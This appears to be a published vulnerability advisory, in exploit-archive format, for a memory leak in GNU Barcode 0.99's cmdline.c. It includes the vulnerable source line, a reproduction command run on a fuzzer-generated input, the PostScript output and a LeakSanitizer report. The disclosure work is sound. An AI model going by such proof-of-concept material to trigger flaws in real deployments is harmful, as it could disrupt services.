# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)
130: {
131: struct commandline *ptr;
132: char *getopt_desc = (char *)calloc(512, 1);
133: int desc_offset = 0;
134: int opt, retval;
135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
% height xpos ypos width height xpos ypos width
[75.00 11.00 15.00 1.85] [75.00 13.50 15.00 0.85]
[75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85]
[70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85]
[70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85]
[70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85]
[70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85]
[70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85]
[70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85]
[70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85]
[70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85]
[70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85]
[70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85]
[70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85]
[70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85]
[70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85]
[70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85]
[70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85]
[70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85]
[70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85]
[70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85]
[70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85]
[70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85]
[70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85]
[70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85]
[70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85]
[70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85]
[70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85]
[70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85]
[70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85]
[70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85]
[70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85]
[70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85]
[70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85]
[70.00 283.00 20.00 1.85] [70.00 285.50 20.00 0.85]
[70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85]
[70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85]
[70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85]
[70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85]
[70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85]
[70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85]
[70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85]
[70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85]
[70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85]
[70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85]
[70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85]
[70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85]
[70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85]
[70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85]
[70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85]
[70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85]
[70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85]
[70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85]
[70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85]
[70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85]
[70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85]
[70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85]
[70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85]
[70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85]
[70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85]
[70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85]
[70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85]
[70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85]
[70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85]
[70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85]
[70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85]
[70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85]
[70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85]
[70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85]
[70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85]
[70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85]
[70.00 552.00 20.00 1.85] [70.00 555.50 20.00 0.85]
[70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85]
[70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85]
[70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85]
[70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85]
[70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85]
[70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85]
[70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85]
[70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85]
[70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85]
[75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85]
[75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(o) 21.00 10.00 12.00]
[(/) 32.00 10.00 0.00]
[(c) 43.00 10.00 0.00]
[(r) 54.00 10.00 0.00]
[(a) 65.00 10.00 0.00]
[(s) 76.00 10.00 0.00]
[(h) 87.00 10.00 0.00]
[(e) 98.00 10.00 0.00]
[(s) 109.00 10.00 0.00]
[(/) 120.00 10.00 0.00]
[(i) 131.00 10.00 0.00]
[(d) 142.00 10.00 0.00]
[(:) 153.00 10.00 0.00]
[(0) 164.00 10.00 0.00]
[(0) 175.00 10.00 0.00]
[(0) 186.00 10.00 0.00]
[(0) 197.00 10.00 0.00]
[(3) 208.00 10.00 0.00]
[(4) 219.00 10.00 0.00]
[(,) 230.00 10.00 0.00]
[(s) 241.00 10.00 0.00]
[(i) 252.00 10.00 0.00]
[(g) 263.00 10.00 0.00]
[(:) 274.00 10.00 0.00]
[(0) 285.00 10.00 0.00]
[(6) 296.00 10.00 0.00]
[(,) 307.00 10.00 0.00]
[(s) 318.00 10.00 0.00]
[(r) 329.00 10.00 0.00]
[(c) 340.00 10.00 0.00]
[(:) 351.00 10.00 0.00]
[(0) 362.00 10.00 0.00]
[(0) 373.00 10.00 0.00]
[(0) 384.00 10.00 0.00]
[(0) 395.00 10.00 0.00]
[(0) 406.00 10.00 0.00]
[(0) 417.00 10.00 0.00]
[(,) 428.00 10.00 0.00]
[(o) 439.00 10.00 0.00]
[(p) 450.00 10.00 0.00]
[(:) 461.00 10.00 0.00]
[(h) 472.00 10.00 0.00]
[(a) 483.00 10.00 0.00]
[(v) 494.00 10.00 0.00]
[(o) 505.00 10.00 0.00]
[(c) 516.00 10.00 0.00]
[(,) 527.00 10.00 0.00]
[(r) 538.00 10.00 0.00]
[(e) 549.00 10.00 0.00]
[(p) 560.00 10.00 0.00]
[(:) 571.00 10.00 0.00]
[(1) 582.00 10.00 0.00]
[(2) 593.00 10.00 0.00]
[(8) 604.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).